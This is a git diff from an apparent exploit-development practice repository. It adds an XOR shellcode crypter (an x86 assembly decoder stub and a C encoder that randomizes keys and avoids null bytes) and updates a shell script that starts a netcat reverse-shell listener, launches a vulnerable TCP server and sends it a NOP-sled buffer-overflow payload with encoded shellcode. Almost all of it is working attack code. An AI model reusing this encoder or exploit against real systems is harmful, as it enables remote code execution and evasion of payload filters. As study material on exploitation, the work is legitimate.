diff options
| -rw-r--r-- | crypter/xor2_decoder.asm | 63 | ||||
| -rw-r--r-- | crypter/xor2_encoder.c | 129 | ||||
| -rwxr-xr-x | exploit_tcp.sh | 3 |
3 files changed, 136 insertions, 59 deletions
diff --git a/crypter/xor2_decoder.asm b/crypter/xor2_decoder.asm index cc102b2..93bdedf 100644 --- a/crypter/xor2_decoder.asm +++ b/crypter/xor2_decoder.asm @@ -1,22 +1,61 @@ BITS 32 +; plain x86 | trailer +; --------------------------------------------------------------------------------------------- +; | decoder | 2 byte shellcode len | 1 byte xor key len | xor key (xor key len) | shellcode | +; ----------------[XOR ENCODED]--------------------------------------------------[XOR ENCODED]- +; | Reg: cx | Reg: dl | [esi]+3+dh | [esi]+3+dl+ebx + jmp short go next: -pop esi ; stackpointer -> start+len(encoder) -xor ecx,ecx ; zero out some regs -xor eax,eax +pop esi ; get stackpointer := start+sizeof(decoder) + +xor ecx,ecx +mov word cx,[esi] ; shellcode len (encoded) +xor word cx,0x0101 ; decode shellcode len + +; dh := xor pad +; dl := xor key len xor edx,edx -mov cl,0 ; buffer length -mov dl,4 ; xor padding +mov byte dl,[esi+2] + +xor ebx,ebx ; zero out change: -xor byte [esi + ecx],0 -mov byte al,[esi + ecx] -dec cl -jnz done ; no more bytes left -dec dh -jnz change -mov dh,dl +; calc memory location +mov eax,esi +push dword eax +add dword [esp],0x3 ; shellcode len (2 bytes) + xor key len (1 byte) +movzx eax,dl +add [esp],eax +add [esp],ebx +pop dword eax ; eax holds the pointer to our next encoded byte + +mov edi,eax + +mov eax,esi ; <----- DBG +push dword eax +add dword [esp],0x3 ; see above +movzx eax,dh +add [esp],eax +pop dword eax ; al holds the xor 1-byte-pad +; TODO: not rly efficient, change it! +push dword esi ; save our trailer pointer +mov esi,[eax] +xor eax,eax +mov byte al,esi +pop dword esi ; get our trailer pointer + +xor byte [edi],al + +inc ebx +cmp ebx,ecx +je done ; no more bytes left + +inc dh ; next xor 1-byte-pad +cmp dh,dl ; check if xor pad == xor len +jne change +xor byte dh,dh jmp change done: diff --git a/crypter/xor2_encoder.c b/crypter/xor2_encoder.c index cc46592..fc3f904 100644 --- a/crypter/xor2_encoder.c +++ b/crypter/xor2_encoder.c @@ -1,4 +1,4 @@ -// #DECODER=./xor_decoder.o +// #DECODER=./xor2_decoder.o // #SHELLCODE=../shellcode/hello.o #define _GNU_SOURCE 1 @@ -6,7 +6,10 @@ #include <string.h> #include <sys/time.h> #include <stdlib.h> +#include <stdint.h> #include <unistd.h> +#include <limits.h> +#include <byteswap.h> #ifdef _USE_CFG #include "xor2_encoder.h" @@ -14,17 +17,17 @@ #error "xor2_encoder.h config file missing including decoder && shellcode" #endif -#ifndef _CRYPTVAL -#define _CRYPTVAL 0xff -#endif +#define XOR_KEYLEN 5 +#define SCLEN_XORKEY 0x0101 +#define TRAILER 3 #ifndef _OUTFILE #define _OUTFILE "xor2_encoded.o" #endif -int -getnumber(int n) +long int +getnumber(long int n) { int seed; struct timeval tm; @@ -36,11 +39,11 @@ getnumber(int n) } void -print_code(const char *name, char *data, int len) +print_code(const char *name, char *data, size_t len) { int i,l = 15; - printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) strlen(data), name); + printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) len, name); for (i = 0; i < len; i++) { if (l >= 15) { if (i) { @@ -55,6 +58,52 @@ print_code(const char *name, char *data, int len) printf("\";\n\n"); } +long int +eof_check(char *data, size_t len) +{ + long int i; + + for (i = 0; i < len; i++) { + if ( *(char *)(data + i) == '\0' ) { + return i; + } + } + return -1; +} + +char * +xor_genkey(size_t keylen) +{ + char *key; + long int kd, rnd; + int i = 0; + + key = calloc(sizeof(char), keylen); + while (i+sizeof(long int) < keylen) { + rnd = getnumber(LONG_MAX); + memcpy(&key[i], &rnd, sizeof(long int)); + i += sizeof(long int); + } + kd = keylen - i; + if ( kd != 0 ) { + rnd = getnumber(LONG_MAX); + memcpy(&key[i], &rnd, kd); + } + return key; +} + +void +xor_encrypt(char *buf, size_t buflen, char *key, size_t keylen) +{ + int i; + unsigned char xb; + + for (i = 0; i < buflen; i++) { + xb = key[i % keylen]; + buf[i] ^= xb; + } +} + void err_n_xit(const char *exit_msg, const char *arg) { @@ -74,66 +123,54 @@ err_n_xit(const char *exit_msg, const char *arg) int main(int argc, char **argv) { - int i, npos = 0, number = getnumber(_CRYPTVAL), nullbyte = 0; + int nullbyte = 0; + long int nb_idx; int ldecoder = sizeof(decoder)-1; /* last byte is '\x00' */ - int lshellcode = sizeof(shellcode)-1; /* same as above */ - int first_arg = 1; - char *result; + uint16_t lshellcode = (uint16_t) sizeof(shellcode)-1; /* same as above */ + char *result, *mod_decoder, *xor_key; FILE *outfile; - printf("/* Using value %d to encode the shellcode. */\n", number); printf("/* PRINT SHELLCODE */\n"); print_code("shellcode", shellcode, lshellcode); printf("/* PRINT DECODER */\n"); print_code("decoder", decoder, ldecoder); - for (i = 0; i < ldecoder; i++) { - if (decoder[i] == '\x00') { - if (first_arg) { - decoder[i] = lshellcode; - first_arg = 0; - } else { - decoder[i] = (unsigned char) number; - npos = i; - } - printf("// decoder[%d] = %u (%02x)\n", i, (unsigned char) decoder[i], (unsigned char) decoder[i]); - } + mod_decoder = malloc(ldecoder + TRAILER); // buffer size (2 bytes) + xor key len (1 byte) + memcpy(mod_decoder, decoder, ldecoder); + *(uint16_t *) (&mod_decoder[ldecoder]) = (uint16_t) (lshellcode ^ SCLEN_XORKEY); + *(uint8_t *) (&mod_decoder[ldecoder+2]) = (uint8_t) XOR_KEYLEN; + printf("/* shellcode length: decoder[%u] = %u bytes ^ 0x%04x = 0x%04x */\n", lshellcode, mod_decoder[ldecoder], SCLEN_XORKEY, *(uint16_t *) &mod_decoder[ldecoder]); + printf("/* xor key length: decoder[%u] = %u bytes = 0x%02x */\n", ldecoder+2, mod_decoder[ldecoder+2], mod_decoder[ldecoder+2]); + + if ( (nb_idx = eof_check(mod_decoder , ldecoder+3)) != -1) { + printf("NULLBYTE DETECTED: decoder+0x%04x (%lu)\n", (unsigned int) nb_idx, nb_idx); + exit(-1); } - printf("\n"); - result = malloc(lshellcode); + result = calloc(ldecoder + lshellcode + TRAILER + XOR_KEYLEN, sizeof(char)); + printf("/* total length = %d */\n", ldecoder + lshellcode + TRAILER + XOR_KEYLEN); + memcpy(result, mod_decoder, ldecoder + TRAILER); + free(mod_decoder); do { - memcpy(result, shellcode, lshellcode); + xor_key = xor_genkey(XOR_KEYLEN); + memcpy(result + ldecoder + TRAILER, xor_key, XOR_KEYLEN); + memcpy(result + ldecoder + TRAILER + XOR_KEYLEN, shellcode, lshellcode); + xor_encrypt(result + ldecoder + TRAILER + XOR_KEYLEN, lshellcode, xor_key, XOR_KEYLEN); + print_code("xor", xor_key, XOR_KEYLEN); if (nullbyte == 1) { - number = getnumber(_CRYPTVAL); - fprintf(stderr, "New crypt value: %d (%02x)\n", number, number); - decoder[npos] = number; nullbyte = 0; } - for (i = 0; i < lshellcode; i++) { - result[i] ^= number; - if (result[i] == '\x00') { - nullbyte = 1; - fprintf(stderr, "Recode!\n"); - break; - } - } + free(xor_key); } while (nullbyte == 1); - memcpy(shellcode, result, lshellcode); - free(result); - result = malloc(ldecoder + lshellcode + 1); - memcpy(result, (const void *) decoder, ldecoder); - memcpy(result + ldecoder, shellcode, lshellcode); - *(result + ldecoder + lshellcode) = '\0'; - print_code("result", result, ldecoder + lshellcode); + print_code("result", result, ldecoder + lshellcode + TRAILER + XOR_KEYLEN); /* write2file */ outfile = fopen(_OUTFILE, "w+b"); if (outfile == NULL) err_n_xit("fopen", _OUTFILE); - if (fwrite((void *) result, sizeof(char), strlen(result), outfile) != strlen(result)) err_n_xit("fwrite", _OUTFILE); + if (fwrite((void *) result, sizeof(char), ldecoder + lshellcode + TRAILER + XOR_KEYLEN, outfile) != (ldecoder + lshellcode + TRAILER + XOR_KEYLEN)) err_n_xit("fwrite", _OUTFILE); if (fclose(outfile) != 0) err_n_xit("fclose", _OUTFILE); fprintf(stderr, "outfile: %s\n", _OUTFILE); diff --git a/exploit_tcp.sh b/exploit_tcp.sh index 106489d..aecfe2c 100755 --- a/exploit_tcp.sh +++ b/exploit_tcp.sh @@ -7,7 +7,7 @@ # 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr echo "starting netcat reverse tcp server .." -screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 +screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 sleep 1 echo "starting exploitable tcp server .." ./overflow_tcp & @@ -25,5 +25,6 @@ python -c 'print "\x90"*79 + \ "\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ "\x03\xa2\x22\x81" + \ "\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 +read -p "[PRESS RETURN TO CONTINUE]" screen -R overcat |